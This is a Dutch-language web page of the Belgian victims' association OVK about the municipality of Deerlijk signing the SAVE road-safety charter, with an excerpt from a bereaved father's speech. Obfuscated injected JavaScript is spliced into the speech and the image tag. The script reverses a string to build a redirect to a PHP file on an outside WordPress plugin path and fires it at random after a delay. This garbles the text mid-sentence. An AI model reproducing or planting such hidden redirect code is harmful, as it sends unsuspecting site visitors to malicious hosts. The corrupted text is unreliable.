Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Ondertekening Deerlijk was een succes

Op woensdag 12 december ’12 ondertekende het gemeentebestuur van Deerlijk als 12de Vlaamse gemeente het SAVE-charter Steden & Gemeenten.

Een verslagje van deze ondertekening kan hier teruggevonden worden.

Ronny Kimpe, bestuurslid van OVK, papa van Bram en inwoner van Deerlijk bedankte de gemeente Deerlijk van harte voor dit initiatief, zoals een uitreksel uit zijn toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toespraak weergeeft:

“Lieve mensen, OVK telt op vandaag meer dan 1600 leden, verenigd in ongeveer 600 families. Mijn gedachten gaan speciaal vandaag naar de kinderen van onze leden maar ook van de niet-leden. Onder meer: Jeffrey Vandenbroucke,  Jeffrey Debrabander, Jurgen Bouckhout, Romina Malfrère, Wouter Vancraeynest,  Robbie Van Eeckhout en onze eigen Bram.

Lieve mensen,  onze vereniging is succesvol wanneer het aantal leden daalt.  Wanneer de namenlijsten zoals ik er juist één opsomde nooit meer langer worden.

Ik ben er van overtuigd, dat we door onze samenwerking, dit in de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst, samen kunnen proberen te verwezenlijken. Ik wil dan ook in naam van alle lotgenoten het gemeentebestuur van Deerlijk bedanken  voor dit engagement, en kan ik nu met enige fierheid zeggen dat ik niet alleen in een fairtrade gemeente woon maar ook in een SAVE Gemeente!”

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-MV-.jpg”>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-MV-.jpg” alt=”” width=”500″ height=”332″ />


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be